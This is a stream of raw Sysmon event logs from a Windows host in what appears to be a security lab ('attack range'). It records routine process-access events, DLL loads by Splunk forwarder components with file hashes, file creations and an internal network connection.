13:06:46.890{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100554Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100553Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100552Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100551Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-A252-6294-0500-000000005502}4161908C:\Windows\system32\csrss.exe{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000100550Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-A44C-6294-0501-000000005502}51646008C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000100549Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.891{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.2.5Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{326FD73D-A253-6294-E703-000000000000}0x3e70SystemMD5=611F936426EC989CDC9FB43B692D3CFA,SHA256=AF94FF9B82C4BF6F27A5695E741D2BDF06A6A574924179D0BC9E7B8A725882F5,IMPHASH=A2763C4BA6D4717F662584401724A6B2{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000100548Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.378{326FD73D-A262-6294-2400-000000005502}2732NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-099f25d280474ac19\channels\health\respondent-20220530105428-128MD5=3A7897B317CA03B79FE07533175F9643,SHA256=F76FF17815B8F96571634A983322FD544389A7130FC207258DDFB92658757A4D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x8000000000000000100547Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:42.158{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53362-false10.0.1.12-8000- 734700x8000000000000000100546Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.173{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659C,IMPHASH=94524C03C5380F78283785F1E05E667DtrueMicrosoft WindowsValid 734700x8000000000000000100545Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.173{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146,IMPHASH=F67CBD9561C1FEF51B817BA184E81D2EtrueMicrosoft WindowsValid 734700x8000000000000000100544Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.173{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1A,IMPHASH=E7FD2920222985E31019D022BB39EFBEtrueMicrosoft WindowsValid 23542300x8000000000000000100657Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:47.652{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=477A4615B5B5F3A25F8490657F5741BC,SHA256=5D6D2ADCB19FEAFBC862A9871533FB65C81EE6806DDAF3C9ADA42BDB57B4965C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x8000000000000000100656Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:47.543{326FD73D-C167-6294-490B-000000005502}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659C,IMPHASH=94524C03C5380F78283785F1E05E667DtrueMicrosoft WindowsValid 734700x8000000000000000100655Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:47.543{326FD73D-C167-6294-490B-000000005502}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146,IMPHASH=F67CBD9561C1FEF51B817BA184E81D2EtrueMicrosoft WindowsValid 734700x8000000000000000100654Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:47.543{326FD73D-C167-6294-490B-000000005502}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1A,IMPHASH=E7FD2920222985E31019D022BB39EFBEtrueMicrosoft WindowsValid 734700x8000000000000000100653Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:47.418{326FD73D-C167-6294-490B-000000005502}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FE,IMPHASH=9E9C9DFD04CDDF2B6F1412BF096AEAF4trueMicrosoft WindowsValid 734700x8000000000000000100652Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:47.418{326FD73D-C167-6294-490B-000000005502}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862,IMPHASH=C918D75BDB7774C087BB6C0C9C0A7686trueMicrosoft WindowsValid 734700x8000000000000000100651Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:47.402{326FD73D-C167-6294-490B-000000005502}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778C,IMPHASH=96CBD1B5C0EA88B677BA3BB5FD009869trueMicrosoft WindowsValid 734700x8000000000000000100650Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:47.402{326FD73D-C167-6294-490B-000000005502}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\srvcli.dll10.0.14393.5066 (rs1_release.220401-1841)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1EC,IMPHASH=6CC8301D560C9DC6CB13A6320F3A3B1FtrueMicrosoft WindowsValid 734700x8000000000000000100649Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:47.402{326FD73D-C167-6294-490B-000000005502}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74,IMPHASH=7C2E79D83754439DC7DE7882DCB4238DtrueMicrosoft WindowsValid 734700x8000000000000000100648Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:47.402{326FD73D-C167-6294-490B-000000005502}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\wkscli.dll10.0.14393.5066 (rs1_release.220401-1841)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3D375474E2FE9A77D243E35954287188,SHA256=7850F11166D7CACED6F628033524ED86191AE92772000AFA677E59A664396E8C,IMPHASH=6990BA83B94C81786A84E6C44E699D03trueMicrosoft WindowsValid 734700x8000000000000000100647Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:47.402{326FD73D-C167-6294-490B-000000005502}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923,IMPHASH=7D1B32891B9173ED71ED6C18DEFEE578trueMicrosoft WindowsValid 734700x8000000000000000100646Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:47.402{326FD73D-C167-6294-490B-000000005502}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\netapi32.dll10.0.14393.5125 (rs1_release.220429-1732)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=E8FF656B90334BED915B2BC6BBE57C9A,SHA256=8BB399AD98B9D9C637D09EB48306B1E80C50BAA7D1C9811595D9042E4294173C,IMPHASH=FE007B4B6CED5075C98434207FFF87E0trueMicrosoft WindowsValid 734700x8000000000000000100645Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:47.402{326FD73D-C167-6294-490B-000000005502}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\sspicli.dll10.0.14393.5006 (rs1_release.220301-1704)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=F0258C58C8DC45AF9B5AAF9BA49E0C53,SHA256=8E1EAA39742CC0E97D615229E9C13C8447B8D115B4678A1F03BE3E8E20345521,IMPHASH=4B1C9487A6420C18F688F0EC5BEB6F33trueMicrosoft WindowsValid 734700x8000000000000000100644Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:47.402{326FD73D-C167-6294-490B-000000005502}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FF,IMPHASH=ADF99B9EA3A1F76C33522F96772BC4DDtrueMicrosoft CorporationValid 734700x8000000000000000100643Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:47.402{326FD73D-C167-6294-490B-000000005502}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\Wldap32.dll10.0.14393.5125 (rs1_release.220429-1732)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=5760D3C7E030C7F1984753F6050BF4DA,SHA256=DCB422305A2B3160F8FD53B3F3841B1EE80E4D81D2599FA02CEA9BBC5E5E2834,IMPHASH=D13722FCCB1CDD38974ADB7277D98799trueMicrosoft WindowsValid 734700x8000000000000000100642Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:47.402{326FD73D-C167-6294-490B-000000005502}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5,IMPHASH=5B59892514923CABE9B70CFE22A3F59AtrueMicrosoft WindowsValid 734700x8000000000000000100641Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:47.402{326FD73D-C167-6294-490B-000000005502}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75E,IMPHASH=8987D71C85BB2C13D3D90194331F962FtrueMicrosoft WindowsValid 734700x8000000000000000100640Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:47.402{326FD73D-C167-6294-490B-000000005502}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FAD,IMPHASH=BA5C37A1CF8C2730ED1F4DA1587496A5trueMicrosoft WindowsValid 734700x8000000000000000100639Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:47.402{326FD73D-C167-6294-490B-000000005502}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9,IMPHASH=2CB5DA5225E972A08F32D04B8085DC7EtrueMicrosoft CorporationValid 734700x8000000000000000100638Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:47.402{326FD73D-C167-6294-490B-000000005502}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\combase.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=D63E9AB9C67A611B947527D96B81B44D,SHA256=0F050418ED9A8C0F879636B1B25AF9C651966FE75B8EFAD76F2AD73BB0AD54BC,IMPHASH=0863DD72CA0C3702DB7ACD19A4D5DEB1trueMicrosoft WindowsValid 734700x8000000000000000100637Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:47.402{326FD73D-C167-6294-490B-000000005502}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54,IMPHASH=AFF2E9AF6DD20912DC1E604BDBCA3761trueMicrosoft WindowsValid 734700x8000000000000000100636Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:47.402{326FD73D-C167-6294-490B-000000005502}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=B28B29D2F85EB8349BFB5E7214D7F4D5,SHA256=17260ACBE55D8988E598ECEFBC60140EBE057336B47D8089444588321F067280,IMPHASH=838F909F0A52D977E0B8662364FA0BFEtrueSplunk, Inc.Valid 734700x8000000000000000100635Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:47.402{326FD73D-C167-6294-490B-000000005502}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=3858DC319832992A738C12330E3E579C,SHA256=DEDE14211FCAE7CB5500730B35BABFEAC1F0D207A248D8B6418D2EEF8F348716,IMPHASH=9724475F92787AFC45A3BA458C0DCDC5trueMicrosoft WindowsValid 734700x8000000000000000100634Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:47.402{326FD73D-C167-6294-490B-000000005502}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=AD564ED89D67D88709AA5980BAE20604,SHA256=0EEBE5AA750667908006742E133AE1C273D966897B95B1A0E63826450BB4780A,IMPHASH=A48DFE6DD98128BE3EB687CBF2724A44trueSplunk, Inc.Valid 734700x8000000000000000100633Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:47.402{326FD73D-C167-6294-490B-000000005502}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\gdi32full.dll10.0.14393.5125 (rs1_release.220429-1732)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=BA612E99251C829D7E20073F81A02617,SHA256=9BCFD0E0857596C5F0F7596B6A4A9207684617D8333EEAE9BC482AE1802752D9,IMPHASH=059EB3BAA45E35C79FAE66F7279059EEtrueMicrosoft WindowsValid 734700x8000000000000000100632Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:47.402{326FD73D-C167-6294-490B-000000005502}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=98C643DECFE1971BE3E8B076B19BFD72,SHA256=A520C20F316C902985449BC17AB5F86FCF2F41420B08C1AE08BA06E767EB49F3,IMPHASH=464BF3FDF330E6A15D24CC679EF7F72EtrueSplunk, Inc.Valid 734700x8000000000000000100631Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:47.402{326FD73D-C167-6294-490B-000000005502}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=9BC99DECE580BD163AC318FCD1ACB667,SHA256=94BA08021E14476ED8EC2DC81165574B64274E20F2D8DE9CA98CD0D10CE279F7,IMPHASH=3295DC2518E43BEF226F8847873D20C2trueSplunk, Inc.Valid 734700x8000000000000000100630Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:47.402{326FD73D-C167-6294-490B-000000005502}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3,IMPHASH=57ABD1FDE351971A01E912069E11B44CtrueMicrosoft WindowsValid 734700x8000000000000000100629Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:47.402{326FD73D-C167-6294-490B-000000005502}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8,IMPHASH=A24D446CB7FCBB6D29B592603C0BE00CtrueMicrosoft WindowsValid 